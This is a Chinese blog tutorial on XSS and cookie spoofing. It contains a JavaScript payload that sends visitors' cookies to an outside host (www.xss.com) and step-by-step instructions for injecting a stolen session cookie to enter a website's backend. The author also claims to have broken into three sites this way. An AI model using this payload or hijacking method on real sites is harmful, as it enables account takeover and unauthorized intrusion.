通過COOKIE欺騙登錄網站后台


1.今天閑着沒事看了看關於XSS(跨站腳本攻擊)和CSRF(跨站請求偽造)的知識,xss表示Cross Site Scripting(跨站腳本攻擊),它與SQL注入攻擊類似,SQL注入攻擊中以SQL語句作為用戶輸入,從而達到查詢/修改/刪除數據的目的,而在xss攻擊中,通過插入惡意腳本,實現對用戶游覽器的控制,CSRF全名是Cross-site request forgery,是一種對網站的惡意利用,CSRF比XSS更具危險性。其實XSS攻擊就是網站輸入框沒有限制非法字符,或者沒有對腳本內容進行編碼導致的!

 

var img = document.createElement('img');
img.src
='http://www.xss.com?cookie='+document.cookie;
img.style.display
='none';
document.getElementsByTagName(
'body')[0].appendChild(img);

 

比如這段代碼,當我們沒有對網站輸入框進行非法字符的限制的話,用戶輸入了這段腳本,這樣就會神不知鬼不覺的把當前用戶的cookie發送給了我的惡意站點,我的惡意站點通過獲取get參數就拿到了用戶的cookie。當然我們可以通過這個方法拿到用戶各種各樣的數據。

 

 

2.當然我今天說的主要不是這些,而是通過你拿到的cookie,植入到你的瀏覽器中然后就可以訪問網站后台了,下面我來為大家演示一遍,如何通過已存在的Cookie,進入博客園后台,我用IE瀏覽器和Chrome瀏覽器來測試!

首先我們通過IE瀏覽器拿到我們登入博客園后的Cookie,通過IECookiesview插件可以查看到IE瀏覽器下所有的Cookie信息,然后我們找到cnblogs.com站點下的Cookie,然后復制下.CNBlogsCookie和key和value值,如圖所示! 

 

3.眾所周知,cookies屬於隱私數據,不同瀏覽器保存在不同地方。不可能共享的,此時我們再次打開Chorme瀏覽器,如圖IE瀏覽器為登錄狀態,而chorme瀏覽器為未登錄狀態

 

 

4.那么此時我們就將剛拷貝的IE瀏覽器下博客園的cookie數據植入到chrome瀏覽器中,實現cookie欺騙登錄到博客園后台,在chrome瀏覽器中添加cookies擴展程序,方便寫入和刪除cookie

 

 

5.然后打開cookies插件,我們就找到cnblogs.com下的cookie,默認沒有登錄的時候是沒有.CNBlogsCookie這個cookie的, 然后我們點擊添加一個cookie,將.CNBlogsCookie和key和value值寫入進去,再刷新網站頁面,成功進入博客園網站后台!  

 

 

6.如果將這個方法,再結合到開始講的XSS攻擊的話獲取到別人網站的cookie信息,那么黑進別人網站的后台就很容易了,我自己也試了三個網站,都是可以成功進入的! 當然我說這些不是為了讓大家黑別人的網站,只是只有弄懂了這些,才能更好的防范,保證自己開發的網站的安全! 


注意!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系我们删除。



 
粤ICP备14056181号  © 2014-2020 ITdaan.com